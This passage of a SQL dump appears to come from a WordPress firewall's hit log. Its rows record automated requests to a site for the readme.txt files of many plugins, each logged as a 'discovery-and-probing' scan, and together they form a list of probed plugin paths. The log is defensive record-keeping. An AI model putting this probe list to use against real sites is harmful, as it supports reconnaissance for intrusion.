scans','{\"learningMode\":0,\"failedRules\":\"logged|500\",\"paramKey\":\"cmVxdWVzdC51cmk=\",\"paramValue\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9hbHBoYWJldGljLXBhZ2luYXRpb24vcmVhZG1lLnR4dA==\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9hbHBoYWJldGljLXBhZ2luYXRpb24vcmVhZG1lLnR4dA==\",\"category\":\"discovery-and-probing\",\"ssl\":1}'),(12421,1674981392.835752,1674981392.715700,'\0\0\0\0\0\0\0\0\0\0��t�w8',0,200,0,0,0,'https://www.dailyjolly.co.uk/wp-content/plugins/alphabetic-pagination/readme.txt','https://www.google.com/search?','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36','logged:waf','Readme.txt and debug.log scans','{\"learningMode\":0,\"failedRules\":\"logged|500\",\"paramKey\":\"cmVxdWVzdC5wYXRo\",\"paramValue\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9hbHBoYWJldGljLXBhZ2luYXRpb24vcmVhZG1lLnR4dA==\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9hbHBoYWJldGljLXBhZ2luYXRpb24vcmVhZG1lLnR4dA==\",\"category\":\"discovery-and-probing\",\"ssl\":1}'),(12422,1674981413.562504,1674981413.439600,'\0\0\0\0\0\0\0\0\0\0��t�w8',0,200,0,0,0,'https://www.dailyjolly.co.uk/wp-content/plugins/booking-calendar/readme.txt','https://www.google.com/search?','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36','logged:waf','Readme.txt and debug.log scans','{\"learningMode\":0,\"failedRules\":\"logged|500\",\"paramKey\":\"cmVxdWVzdC51cmk=\",\"paramValue\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9ib29raW5nLWNhbGVuZGFyL3JlYWRtZS50eHQ=\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9ib29raW5nLWNhbGVuZGFyL3JlYWRtZS50eHQ=\",\"category\":\"discovery-and-probing\",\"ssl\":1}'),(12423,1674981413.562385,1674981413.439600,'\0\0\0\0\0\0\0\0\0\0��t�w8',0,200,0,0,0,'https://www.dailyjolly.co.uk/wp-content/plugins/booking-calendar/readme.txt','https://www.google.com/search?','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36','logged:waf','Readme.txt and debug.log scans','{\"learningMode\":0,\"failedRules\":\"logged|500\",\"paramKey\":\"cmVxdWVzdC5wYXRo\",\"paramValue\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9ib29raW5nLWNhbGVuZGFyL3JlYWRtZS50eHQ=\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9ib29raW5nLWNhbGVuZGFyL3JlYWRtZS50eHQ=\",\"category\":\"discovery-and-probing\",\"ssl\":1}'),(12424,1674981423.808747,1674981423.684900,'\0\0\0\0\0\0\0\0\0\0��t�w8',0,200,0,0,0,'https://www.dailyjolly.co.uk/wp-content/plugins/jobboardwp/readme.txt','https://www.google.com/search?','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36','logged:waf','Readme.txt and debug.log scans','{\"learningMode\":0,\"failedRules\":\"logged|500\",\"paramKey\":\"cmVxdWVzdC51cmk=\",\"paramValue\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9qb2Jib2FyZHdwL3JlYWRtZS50eHQ=\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9qb2Jib2FyZHdwL3JlYWRtZS50eHQ=\",\"category\":\"discovery-and-probing\",\"ssl\":1}'),(12425,1674981423.808631,1674981423.684900,'\0\0\0\0\0\0\0\0\0\0��t�w8',0,200,0,0,0,'https://www.dailyjolly.co.uk/wp-content/plugins/jobboardwp/readme.txt','https://www.google.com/search?','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36','logged:waf','Readme.txt and debug.log scans','{\"learningMode\":0,\"failedRules\":\"logged|500\",\"paramKey\":\"cmVxdWVzdC5wYXRo\",\"paramValue\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9qb2Jib2FyZHdwL3JlYWRtZS50eHQ=\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9qb2Jib2FyZHdwL3JlYWRtZS50eHQ=\",\"category\":\"discovery-and-probing\",\"ssl\":1}'),(12426,1674981418.689468,1674981418.571500,'\0\0\0\0\0\0\0\0\0\0��t�w8',0,200,0,0,0,'https://www.dailyjolly.co.uk/wp-content/plugins/mstore-api/readme.txt','https://www.google.com/search?','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36','logged:waf','Readme.txt and debug.log scans','{\"learningMode\":0,\"failedRules\":\"logged|500\",\"paramKey\":\"cmVxdWVzdC51cmk=\",\"paramValue\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9tc3RvcmUtYXBpL3JlYWRtZS50eHQ=\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9tc3RvcmUtYXBpL3JlYWRtZS50eHQ=\",\"category\":\"discovery-and-probing\",\"ssl\":1}'),(12427,1674981418.689349,1674981418.571500,'\0\0\0\0\0\0\0\0\0\0��t�w8',0,200,0,0,0,'https://www.dailyjolly.co.uk/wp-content/plugins/mstore-api/readme.txt','https://www.google.com/search?','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36','logged:waf','Readme.txt and debug.log scans','{\"learningMode\":0,\"failedRules\":\"logged|500\",\"paramKey\":\"cmVxdWVzdC5wYXRo\",\"paramValue\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9tc3RvcmUtYXBpL3JlYWRtZS50eHQ=\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9tc3RvcmUtYXBpL3JlYWRtZS50eHQ=\",\"category\":\"discovery-and-probing\",\"ssl\":1}'),(12428,1674981433.932840,1674981433.781500,'\0\0\0\0\0\0\0\0\0\0��t�w8',0,200,0,0,0,'https://www.dailyjolly.co.uk/wp-content/plugins/nd-restaurant-reservations/readme.txt','https://www.google.com/search?','Mozilla/5.0 (Linux; Android 11; ONEPLUS A6013) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Mobile Safari/537.36','logged:waf','Readme.txt and debug.log scans','{\"learningMode\":0,\"failedRules\":\"logged|500\",\"paramKey\":\"cmVxdWVzdC51cmk=\",\"paramValue\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9uZC1yZXN0YXVyYW50LXJlc2VydmF0aW9ucy9yZWFkbWUudHh0\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9uZC1yZXN0YXVyYW50LXJlc2VydmF0aW9ucy9yZWFkbWUudHh0\",\"category\":\"discovery-and-probing\",\"ssl\":1}'),(12429,1674981433.932719,1674981433.781500,'\0\0\0\0\0\0\0\0\0\0��t�w8',0,200,0,0,0,'https://www.dailyjolly.co.uk/wp-content/plugins/nd-restaurant-reservations/readme.txt','https://www.google.com/search?','Mozilla/5.0 (Linux; Android 11; ONEPLUS A6013) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Mobile Safari/537.36','logged:waf','Readme.txt and debug.log scans','{\"learningMode\":0,\"failedRules\":\"logged|500\",\"paramKey\":\"cmVxdWVzdC5wYXRo\",\"paramValue\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9uZC1yZXN0YXVyYW50LXJlc2VydmF0aW9ucy9yZWFkbWUudHh0\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9uZC1yZXN0YXVyYW50LXJlc2VydmF0aW9ucy9yZWFkbWUudHh0\",\"category\":\"discovery-and-probing\",\"ssl\":1}'),(12430,1674981439.141172,1674981439.035800,'\0\0\0\0\0\0\0\0\0\0��t�w8',0,200,0,0,0,'https://www.dailyjolly.co.uk/wp-content/plugins/nd-booking/readme.txt','https://www.google.com/search?','Mozilla/5.0 (iPhone; CPU iPhone OS 16_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/107.0.5304.101 Mobile/15E148 Safari/604.1','logged:waf','Readme.txt and debug.log scans','{\"learningMode\":0,\"failedRules\":\"logged|500\",\"paramKey\":\"cmVxdWVzdC51cmk=\",\"paramValue\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9uZC1ib29raW5nL3JlYWRtZS50eHQ=\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9uZC1ib29raW5nL3JlYWRtZS50eHQ=\",\"category\":\"discovery-and-probing\",\"ssl\":1}'),(12431,1674981439.141062,1674981439.035800,'\0\0\0\0\0\0\0\0\0\0��t�w8',0,200,0,0,0,'https://www.dailyjolly.co.uk/wp-content/plugins/nd-booking/readme.txt','https://www.google.com/search?','Mozilla/5.0 (iPhone; CPU iPhone OS 16_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/107.0.5304.101 Mobile/15E148 Safari/604.1','logged:waf','Readme.txt and debug.log scans','{\"learningMode\":0,\"failedRules\":\"logged|500\",\"paramKey\":\"cmVxdWVzdC5wYXRo\",\"paramValue\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9uZC1ib29raW5nL3JlYWRtZS50eHQ=\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9uZC1ib29raW5nL3JlYWRtZS50eHQ=\",\"category\":\"discovery-and-probing\",\"ssl\":1}'),(12432,1674981459.701807,1674981459.581400,'\0\0\0\0\0\0\0\0\0\0��t�w8',0,200,0,0,0,'https://www.dailyjolly.co.uk/wp-content/plugins/wp-file-manager/readme.txt','https://www.google.com/search?','Mozilla/5.0 (Linux; Android 11; Lenovo YT-J706X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36','logged:waf','Readme.txt and debug.log scans','{\"learningMode\":0,\"failedRules\":\"logged|500\",\"paramKey\":\"cmVxdWVzdC51cmk=\",\"paramValue\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy93cC1maWxlLW1hbmFnZXIvcmVhZG1lLnR4dA==\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy93cC1maWxlLW1hbmFnZXIvcmVhZG1lLnR4dA==\",\"category\":\"discovery-and-probing\",\"ssl\":1}'),(12433,1674981459.701686,1674981459.581400,'\0\0\0\0\0\0\0\0\0\0��t�w8',0,200,0,0,0,'https://www.dailyjolly.co.uk/wp-content/plugins/wp-file-manager/readme.txt','https://www.google.com/search?','Mozilla/5.0 (Linux; Android 11; Lenovo YT-J706X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36','logged:waf','Readme.txt and debug.log scans','{\"learningMode\":0,\"failedRules\":\"logged|500\",\"paramKey\":\"cmVxdWVzdC5wYXRo\",\"paramValue\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy93cC1maWxlLW1hbmFnZXIvcmVhZG1lLnR4dA==\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy93cC1maWxlLW1hbmFnZXIvcmVhZG1lLnR4dA==\",\"category\":\"discovery-and-probing\",\"ssl\":1}'),(12434,1674981477.266929,1674981477.145900,'\0\0\0\0\0\0\0\0\0\0��t�w8',0,200,0,0,0,'https://www.dailyjolly.co.uk/wp-content/plugins/membership-for-woocommerce/readme.txt','https://www.google.com/search?','Mozilla/5.0 (Macintosh; Intel Mac OS X 13_0_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36','logged:waf','Readme.txt and debug.log scans','{\"learningMode\":0,\"failedRules\":\"logged|500\",\"paramKey\":\"cmVxdWVzdC51cmk=\",\"paramValue\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9tZW1iZXJzaGlwLWZvci13b29jb21tZXJjZS9yZWFkbWUudHh0\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9tZW1iZXJzaGlwLWZvci13b29jb21tZXJjZS9yZWFkbWUudHh0\",\"category\":\"discovery-and-probing\",\"ssl\":1}'),(12435,1674981477.266807,1674981477.145900,'\0\0\0\0\0\0\0\0\0\0��t�w8',0,200,0,0,0,'https://www.dailyjolly.co.uk/wp-content/plugins/membership-for-woocommerce/readme.txt','https://www.google.com/search?','Mozilla/5.0 (Macintosh; Intel Mac OS X 13_0_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36','logged:waf','Readme.txt and debug.log scans','{\"learningMode\":0,\"failedRules\":\"logged|500\",\"paramKey\":\"cmVxdWVzdC5wYXRo\",\"paramValue\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9tZW1iZXJzaGlwLWZvci13b29jb21tZXJjZS9yZWFkbWUudHh0\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9tZW1iZXJzaGlwLWZvci13b29jb21tZXJjZS9yZWFkbWUudHh0\",\"category\":\"discovery-and-probing\",\"ssl\":1}'),(12436,1674981492.331665,1674981492.209600,'\0\0\0\0\0\0\0\0\0\0��t�w8',0,200,0,0,0,'https://www.dailyjolly.co.uk/wp-content/plugins/ninja-forms/readme.txt','https://www.google.com/search?','Mozilla/5.0 (Linux; Android 11; Lenovo YT-J706X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36','logged:waf','Readme.txt and debug.log scans','{\"learningMode\":0,\"failedRules\":\"logged|500\",\"paramKey\":\"cmVxdWVzdC51cmk=\",\"paramValue\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9uaW5qYS1mb3Jtcy9yZWFkbWUudHh0\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9uaW5qYS1mb3Jtcy9yZWFkbWUudHh0\",\"category\":\"discovery-and-probing\",\"ssl\":1}'),(12437,1674981492.331551,1674981492.209600,'\0\0\0\0\0\0\0\0\0\0��t�w8',0,200,0,0,0,'https://www.dailyjolly.co.uk/wp-content/plugins/ninja-forms/readme.txt','https://www.google.com/search?','Mozilla/5.0 (Linux; Android 11; Lenovo YT-J706X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36','logged:waf','Readme.txt and debug.log scans','{\"learningMode\":0,\"failedRules\":\"logged|500\",\"paramKey\":\"cmVxdWVzdC5wYXRo\",\"paramValue\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9uaW5qYS1mb3Jtcy9yZWFkbWUudHh0\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9uaW5qYS1mb3Jtcy9yZWFkbWUudHh0\",\"category\":\"discovery-and-probing\",\"ssl\":1}'),(12438,1674981524.556427,1674981524.431100,'\0\0\0\0\0\0\0\0\0\0��t�w8',0,200,0,0,0,'https://www.dailyjolly.co.uk/wp-content/plugins/capabilities-pro/readme.txt','https://www.google.com/search?','Mozilla/5.0 (Linux; Android 11; ONEPLUS A6013) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Mobile Safari/537.36','logged:waf','Readme.txt and debug.log scans','{\"learningMode\":0,\"failedRules\":\"logged|500\",\"paramKey\":\"cmVxdWVzdC51cmk=\",\"paramValue\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9jYXBhYmlsaXRpZXMtcHJvL3JlYWRtZS50eHQ=\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9jYXBhYmlsaXRpZXMtcHJvL3JlYWRtZS50eHQ=\",\"category\":\"discovery-and-probing\",\"ssl\":1}'),(12439,1674981524.556309,1674981524.431100,'\0\0\0\0\0\0\0\0\0\0��t�w8',0,200,0,0,0,'https://www.dailyjolly.co.uk/wp-content/plugins/capabilities-pro/readme.txt','https://www.google.com/search?','Mozilla/5.0 (Linux; Android 11; ONEPLUS A6013) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Mobile Safari/537.36','logged:waf','Readme.txt and debug.log scans','{\"learningMode\":0,\"failedRules\":\"logged|500\",\"paramKey\":\"cmVxdWVzdC5wYXRo\",\"paramValue\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9jYXBhYmlsaXRpZXMtcHJvL3JlYWRtZS50eHQ=\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9jYXBhYmlsaXRpZXMtcHJvL3JlYWRtZS50eHQ=\",\"category\":\"discovery-and-probing\",\"ssl\":1}'),(12440,1674981535.450425,1674981535.329000,'\0\0\0\0\0\0\0\0\0\0��t�w8',0,200,0,0,0,'https://www.dailyjolly.co.uk/wp-content/plugins/vc-tabs/readme.txt','https://www.google.com/search?','Mozilla/5.0 (Linux; Android 12; SM-A205U) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.5304.141 Mobile Safari/537.36','logged:waf','Readme.txt and debug.log scans','{\"learningMode\":0,\"failedRules\":\"logged|500\",\"paramKey\":\"cmVxdWVzdC51cmk=\",\"paramValue\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy92Yy10YWJzL3JlYWRtZS50eHQ=\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy92Yy10YWJzL3JlYWRtZS50eHQ=\",\"category\":\"discovery-and-probing\",\"ssl\":1}'),(12441,1674981535.450293,1674981535.329000,'\0\0\0\0\0\0\0\0\0\0��t�w8',0,200,0,0,0,'https://www.dailyjolly.co.uk/wp-content/plugins/vc-tabs/readme.txt','https://www.google.com/search?','Mozilla/5.0 (Linux; Android 12; SM-A205U) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.5304.141 Mobile Safari/537.36','logged:waf','Readme.txt and debug.log scans','{\"learningMode\":0,\"failedRules\":\"logged|500\",\"paramKey\":\"cmVxdWVzdC5wYXRo\",\"paramValue\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy92Yy10YWJzL3JlYWRtZS50eHQ=\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy92Yy10YWJzL3JlYWRtZS50eHQ=\",\"category\":\"discovery-and-probing\",\"ssl\":1}'),(12442,1674981546.008636,1674981545.882600,'\0\0\0\0\0\0\0\0\0\0��t�w8',0,200,0,0,0,'https://www.dailyjolly.co.uk/wp-content/plugins/masterstudy-lms-learning-management-system/readme.txt','https://www.google.com/search?','Mozilla/5.0 (iPhone; CPU iPhone OS 16_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/107.0.5304.101 Mobile/15E148 Safari/604.1','logged:waf','Readme.txt and debug.log scans','{\"learningMode\":0,\"failedRules\":\"logged|500\",\"paramKey\":\"cmVxdWVzdC51cmk=\",\"paramValue\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9tYXN0ZXJzdHVkeS1sbXMtbGVhcm5pbmctbWFuYWdlbWVudC1zeXN0ZW0vcmVhZG1lLnR4dA==\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9tYXN0ZXJzdHVkeS1sbXMtbGVhcm5pbmctbWFuYWdlbWVudC1zeXN0ZW0vcmVhZG1lLnR4dA==\",\"category\":\"discovery-and-probing\",\"ssl\":1}'),(12443,1674981546.008501,1674981545.882600,'\0\0\0\0\0\0\0\0\0\0��t�w8',0,200,0,0,0,'https://www.dailyjolly.co.uk/wp-content/plugins/masterstudy-lms-learning-management-system/readme.txt','https://www.google.com/search?','Mozilla/5.0 (iPhone; CPU iPhone OS 16_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/107.0.5304.101 Mobile/15E148 Safari/604.1','logged:waf','Readme.txt and debug.log scans','{\"learningMode\":0,\"failedRules\":\"logged|500\",\"paramKey\":\"cmVxdWVzdC5wYXRo\",\"paramValue\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9tYXN0ZXJzdHVkeS1sbXMtbGVhcm5pbmctbWFuYWdlbWVudC1zeXN0ZW0vcmVhZG1lLnR4dA==\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9tYXN0ZXJzdHVkeS1sbXMtbGVhcm5pbmctbWFuYWdlbWVudC1zeXN0ZW0vcmVhZG1lLnR4dA==\",\"category\":\"discovery-and-probing\",\"ssl\":1}'),(12444,1674981561.957400,1674981561.808100,'\0\0\0\0\0\0\0\0\0\0��t�w8',0,200,0,0,0,'https://www.dailyjolly.co.uk/wp-content/plugins/nd-shortcodes/readme.txt','https://www.google.com/search?','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36','logged:waf','Readme.txt and debug.log scans','{\"learningMode\":0,\"failedRules\":\"logged|500\",\"paramKey\":\"cmVxdWVzdC51cmk=\",\"paramValue\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9uZC1zaG9ydGNvZGVzL3JlYWRtZS50eHQ=\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9uZC1zaG9ydGNvZGVzL3JlYWRtZS50eHQ=\",\"category\":\"discovery-and-probing\",\"ssl\":1}'),(12445,1674981561.957275,1674981561.808100,'\0\0\0\0\0\0\0\0\0\0��t�w8',0,200,0,0,0,'https://www.dailyjolly.co.uk/wp-content/plugins/nd-shortcodes/readme.txt','https://www.google.com/search?','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36','logged:waf','Readme.txt and debug.log scans','{\"learningMode\":0,\"failedRules\":\"logged|500\",\"paramKey\":\"cmVxdWVzdC5wYXRo\",\"paramValue\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9uZC1zaG9ydGNvZGVzL3JlYWRtZS50eHQ=\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9uZC1zaG9ydGNvZGVzL3JlYWRtZS50eHQ=\",\"category\":\"discovery-and-probing\",\"ssl\":1}'),(12446,1674981551.782999,1674981551.658700,'\0\0\0\0\0\0\0\0\0\0��t�w8',0,200,0,0,0,'https://www.dailyjolly.co.uk/wp-content/themes/listingo/readme.txt','https://www.google.com/search?','Mozilla/5.0 (Linux; Android 11; Lenovo YT-J706X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36','logged:waf','Readme.txt and debug.log scans','{\"learningMode\":0,\"failedRules\":\"logged|500\",\"paramKey\":\"cmVxdWVzdC51cmk=\",\"paramValue\":\"L3dwLWNvbnRlbnQvdGhlbWVzL2xpc3RpbmdvL3JlYWRtZS50eHQ=\",\"path\":\"L3dwLWNvbnRlbnQvdGhlbWVzL2xpc3RpbmdvL3JlYWRtZS50eHQ=\",\"category\":\"discovery-and-probing\",\"ssl\":1}'),(12447,1674981551.782878,1674981551.658700,'\0\0\0\0\0\0\0\0\0\0��t�w8',0,200,0,0,0,'https://www.dailyjolly.co.uk/wp-content/themes/listingo/readme.txt','https://www.google.com/search?','Mozilla/5.0 (Linux; Android 11; Lenovo YT-J706X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36','logged:waf','Readme.txt and debug.log scans','{\"learningMode\":0,\"failedRules\":\"logged|500\",\"paramKey\":\"cmVxdWVzdC5wYXRo\",\"paramValue\":\"L3dwLWNvbnRlbnQvdGhlbWVzL2xpc3RpbmdvL3JlYWRtZS50eHQ=\",\"path\":\"L3dwLWNvbnRlbnQvdGhlbWVzL2xpc3RpbmdvL3JlYWRtZS50eHQ=\",\"category\":\"discovery-and-probing\",\"ssl\":1}'),(12448,1674981573.362679,1674981573.244400,'\0\0\0\0\0\0\0\0\0\0��t�w8',0,200,0,0,0,'https://www.dailyjolly.co.uk/wp-content/plugins/wp-upg/readme.txt','https://www.google.com/search?','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36','logged:waf','Readme.txt and debug.log scans','{\"learningMode\":0,\"failedRules\":\"logged|500\",\"paramKey\":\"cmVxdWVzdC51cmk=\",\"paramValue\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy93cC11cGcvcmVhZG1lLnR4dA==\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy93cC11cGcvcmVhZG1lLnR4dA==\",\"category\":\"discovery-and-probing\",\"ssl\":1}'),(12449,1674981573.362566,1674981573.244400,'\0\0\0\0\0\0\0\0\0\0��t�w8',0,200,0,0,0,'https://www.dailyjolly.co.uk/wp-content/plugins/wp-upg/readme.txt','https://www.google.com/search?','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36','logged:waf','Readme.txt and debug.log scans','{\"learningMode\":0,\"failedRules\":\"logged|500\",\"paramKey\":\"cmVxdWVzdC5wYXRo\",\"paramValue\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy93cC11cGcvcmVhZG1lLnR4dA==\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy93cC11cGcvcmVhZG1lLnR4dA==\",\"category\":\"discovery-and-probing\",\"ssl\":1}'),(12450,1674981568.136805,1674981568.014600,'\0\0\0\0\0\0\0\0\0\0��t�w8',0,200,0,0,0,'https://www.dailyjolly.co.uk/wp-content/plugins/ultimate-member/readme.txt','https://www.google.com/search?','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36','logged:waf','Readme.txt and debug.log scans','{\"learningMode\":0,\"failedRules\":\"logged|500\",\"paramKey\":\"cmVxdWVzdC51cmk=\",\"paramValue\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy91bHRpbWF0ZS1tZW1iZXIvcmVhZG1lLnR4dA==\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy91bHRpbWF0ZS1tZW1iZXIvcmVhZG1lLnR4dA==\",\"category\":\"discovery-and-probing\",\"ssl\":1}'),(12451,1674981568.136686,1674981568.014600,'\0\0\0\0\0\0\0\0\0\0��t�w8',0,200,0,0,0,'https://www.dailyjolly.co.uk/wp-content/plugins/ultimate-member/readme.txt','https://www.google.com/search?','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36','logged:waf','Readme.txt and debug.log scans','{\"learningMode\":0,\"failedRules\":\"logged|500\",\"paramKey\":\"cmVxdWVzdC5wYXRo\",\"paramValue\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy91bHRpbWF0ZS1tZW1iZXIvcmVhZG1lLnR4dA==\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy91bHRpbWF0ZS1tZW1iZXIvcmVhZG1lLnR4dA==\",\"category\":\"discovery-and-probing\",\"ssl\":1}'),(12452,1674981595.449111,1674981595.317300,'\0\0\0\0\0\0\0\0\0\0��t�w8',0,200,0,0,0,'https://www.dailyjolly.co.uk/wp-content/plugins/yith-woocommerce-gift-cards-premium/readme.txt','https://www.google.com/search?','Mozilla/5.0 (iPhone; CPU iPhone OS 16_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/107.0.5304.101 Mobile/15E148 Safari/604.1','logged:waf','Readme.txt and debug.log scans','{\"learningMode\":0,\"failedRules\":\"logged|500\",\"paramKey\":\"cmVxdWVzdC51cmk=\",\"paramValue\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy95aXRoLXdvb2NvbW1lcmNlLWdpZnQtY2FyZHMtcHJlbWl1bS9yZWFkbWUudHh0\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy95aXRoLXdvb2NvbW1lcmNlLWdpZnQtY2FyZHMtcHJlbWl1bS9yZWFkbWUudHh0\",\"category\":\"discovery-and-probing\",\"ssl\":1}'),(12453,1674981595.448986,1674981595.317300,'\0\0\0\0\0\0\0\0\0\0��t�w8',0,200,0,0,0,'https://www.dailyjolly.co.uk/wp-content/plugins/yith-woocommerce-gift-cards-premium/readme.txt','https://www.google.com/search?','Mozilla/5.0 (iPhone; CPU iPhone OS 16_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/107.0.5304.101 Mobile/15E148 Safari/604.1','logged:waf','Readme.txt and debug.log scans','{\"learningMode\":0,\"failedRules\":\"logged|500\",\"paramKey\":\"cmVxdWVzdC5wYXRo\",\"paramValue\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy95aXRoLXdvb2NvbW1lcmNlLWdpZnQtY2FyZHMtcHJlbWl1bS9yZWFkbWUudHh0\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy95aXRoLXdvb2NvbW1lcmNlLWdpZnQtY2FyZHMtcHJlbWl1bS9yZWFkbWUudHh0\",\"category\":\"discovery-and-probing\",\"ssl\":1}'),(12454,1674981606.474145,1674981606.367800,'\0\0\0\0\0\0\0\0\0\0��t�w8',0,200,0,0,0,'https://www.dailyjolly.co.uk/wp-content/plugins/image-hover-effects-ultimate/readme.txt','https://www.google.com/search?','Mozilla/5.0 (Linux; Android 12; SM-A205U) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.5304.141 Mobile Safari/537.36','logged:waf','Readme.txt and debug.log 